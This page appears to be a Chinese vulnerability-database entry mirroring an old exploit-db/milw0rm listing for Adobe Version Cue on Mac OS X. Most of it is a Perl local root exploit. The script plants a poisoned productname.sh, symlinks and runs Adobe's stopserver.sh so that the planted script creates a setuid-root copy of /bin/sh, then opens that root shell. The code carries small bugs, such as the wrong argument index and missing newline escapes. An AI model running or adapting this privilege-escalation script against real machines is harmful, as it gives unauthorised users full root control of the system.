Apple Mac OSX Adobe Version Cue – Local Privilege Escalation (Perl)

Apple Mac OSX Adobe Version Cue – Local Privilege Escalation (Perl)

漏洞ID 1054885 漏洞类型
发布时间 2005-02-07 更新时间 2005-02-07
图片[1]-Apple Mac OSX Adobe Version Cue – Local Privilege Escalation (Perl)-安全小百科CVE编号 N/A
图片[2]-Apple Mac OSX Adobe Version Cue – Local Privilege Escalation (Perl)-安全小百科CNNVD-ID N/A
漏洞平台 OSX CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/795
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#!/usr/bin/perl -w
#
#####by unl0ck-[0xdeadababe]
#[http://unl0ck.void.ru]
#[http://0xdeadbabe.blackhatz.info]
#-------------------------------------------------
#Only for challenge :) and Researche pruproses.
#####Distribution:
#-------------------------------------------------
#It's a fuck public code , not private.
#Fuck off trade bitchez.
#-------------------------------------------------
#####Appendix:
#-------------------------------------------------
#Mac OS X - Adobe Version Cue local root exploit
#it's a very lame exploit for Adobe Cue.
#-------------------------------------------------
#

if (@ARGV < 1)
 {
 print q(==========
[Mac OS X - Adobe Version Cue local root exploit]
USES: ./un_0wnz_macue.pl /path/to /yours/ Adobe Cue/
--- by unl0ck-[0xdeadbabe] ---
==========
 );
 exit;
 }

$path  = $ARGV[1];

print "[~] Your current id is:n";

system "id";

print "[~] Poisoning productname.sh...n";

system('echo "cp /bin/sh /Users/$USER;chmod 4755 /Users/$USER/sh;chown root /Users/$USER/sh" > productname.sh') == 0 or die "[-] Not writeble dir.";

print "[~] Setting execute permission to poisoned script...n";

system("chmod 0755 ./productname.sh") == 0 or die "[-] Productname.sh here not found.";

print "[~] Copy here stopserver.sh script...n";

system("ln -s $path/stopserver.sh")== 0 or die "Can not copy stopserver.sh from Adobe Cue path.";

print "[~] Running the copyed stopserver.sh...n";

system("./stopserver.sh")== 0 or die "Can not Run stopserver.sh.";

print "[!] Preloading r00t-shell for you..n";

system ("./sh")== 0 or die "Can not preload suid-shell";

print '[+] Exploited. See to euid ;):';

print "n";

system "id";

exit();

# milw0rm.com [2005-02-07]

相关推荐: Abyss Web Server Incomplete HTTP Request Denial Of Service Vulnerability

Abyss Web Server Incomplete HTTP Request Denial Of Service Vulnerability 漏洞ID 1100560 漏洞类型 Failure to Handle Exceptional Condition…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享